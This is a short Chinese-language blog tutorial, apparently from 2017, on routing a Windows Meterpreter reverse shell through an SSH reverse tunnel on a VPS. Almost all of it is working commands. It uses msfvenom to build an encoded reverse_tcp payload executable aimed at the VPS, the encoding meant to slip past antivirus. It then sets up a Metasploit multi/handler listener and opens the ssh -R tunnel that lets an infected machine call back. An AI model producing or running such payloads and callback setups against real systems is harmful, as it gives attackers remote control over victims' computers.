这里首先需要配置VPS ssh服务
编辑 /etc/ssh/sshd_config
在文件最后添加:

GatewayPorts yes

之后配置msf客户端:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=[vpsIP] LPORT=8888 -f exe > abc.exe

之后本地启用监听:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.2.100
lhost => 192.168.2.100
msf exploit(handler) > set lport 8888
lport => 8888
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.2.100:8888 

开启ssh隧道:

ssh -N -R 8888:192.168.2.100:8888 echo@evi1cg.me

客户端被执行以后,成功返回回话:
121221.png

最后由 Evi1cg 编辑于2017年01月17日 16:02